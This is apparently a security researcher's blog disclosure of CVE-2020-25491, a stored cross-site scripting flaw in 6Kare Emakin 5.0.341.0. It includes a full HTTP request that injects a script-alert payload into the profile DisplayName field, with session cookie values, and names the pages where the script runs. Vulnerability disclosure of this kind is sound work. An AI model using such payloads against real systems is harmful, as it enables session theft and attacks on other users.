Headline
CVE-2020-25491: CVE-2020-25491
6Kare Emakin 5.0.341.0 is affected by Cross Site Scripting (XSS) via the /rpc/membership/setProfile DisplayName field, which is mishandled when rendering the Activity Stream page.
What is Emakin?
Emakin is Process Improvement, Teamwork, Mobility, Compatibility, Safety and Security, Reduced Costs, Higher Revenue, Single Platform software for Businesses.
Companies using Emakin include VakıfBank, Ülker, Katılım Emeklilik, Sabancı, Aegon, Eczacıbaşı, Godiva, Tarsim, A101, Near East Bank and various other institutions.
Based on the companies using Emakin, we can say that the software is used extensively in the Turkey.
What is CVE-2020-25491?
CVE-2020-25491 is a basic Stored XSS. The vulnerability is simple.
The “Display Name” field in the profile editing area (https://vulnerable.com/app/#/profile) in the top menu is affected by the related vulnerability.
Request:
POST /rpc/membership/setProfile HTTP/1.1 Host: vulnerable.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 807 Origin: https://vulnerable.com Connection: close Referer: https://vulnerable.com/app/ Cookie: _fbp=fb.2.1598889391208.495488426; cultPref=en-US; cookieToken=D5D4DB9DB3DAD8D77D8C522DCF252136F15DAA85C5F217D42F34EAB79E6F30D346CE7128F84A53911E9E81B947E4ED4D2384F649CDCE2ED20FC53ED1E6CAC816977884D841DD7EAAA9C378E9CB37F51103E7A42B; AKOpenAuth=C52389963AF70A290721BC7C7B4BE9F062152850C92C5C9B48AB80ED00EFCCF074D63D56C2C340EC61802827BEAFF995; .ASPXAUTH=5F48AA8100055D6A13A71418D07796D507B770DA1FD64EC7BBBF367E464FD06A585C11D72EB6383F6E05465862E7025FA37498078450FB797AC4E2EC0DDA1BC99FB0E76B389F78F64F3DA853290CFE4D124E9BAE40F0F231C1C61756483B5A0E7645D713181693BBF1927933791D5D0EBAF52FE1A30A1829E6B7DF795152E333F85719315F606AE9383EF427CC842F1D4B15D12D178108E332CE7387AC74EE932B0300853BF62B000BC321A49B28CDD983D70DABFB45E1565DAD7068FC6C4CD201EE40171A31694C554F0470206EEC1DA1A505D0
{"profile":"<UserProfile><Properties><Name/><Surname/><DisplayName><script>alert(‘1337’)</script></DisplayName><EMailAddress>[email protected]</EMailAddress><Language Caption=\"English (American Samoa)\">en-AS</Language><DateFormat Caption=\"Auto Format\"/><Theme Caption=\"Default\"/></Properties><DomainTheme>Blocks</DomainTheme><Themes><Theme>Blocks</Theme><Theme>Blue</Theme><Theme>Clean</Theme><Theme>Sun</Theme></Themes><Ticket>E52FEF99EB0C4A5FED7AE7AF917040A732C0C69182F331CBC4D0F3F0689246AB1E61492A11C75F61E0989CA9B09E553E7FBA7E7F850D9F872E5FE3BCAFC38359C3E01C53D8E83D2FABE270455C200866182ADDBA</Ticket><Logons><Logon><Provider>Organization</Provider></Logon><Logon><Provider>LDAP</Provider></Logon></Logons><ImageFile Caption=\"\" Url=\"\"/><ImageUrl/></UserProfile>"}
You can see the payload is: <script>alert(‘1337’)</script>
Then you can see that the vulnerability is triggered on the Activity Stream (https://vulnerable.com/app/#/activitystream) and Work Item (https://vulnerable.com/app/#/workitem/WorkItemId) pages.
For more details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25491
For more blogposts: https://ayberk.ninja/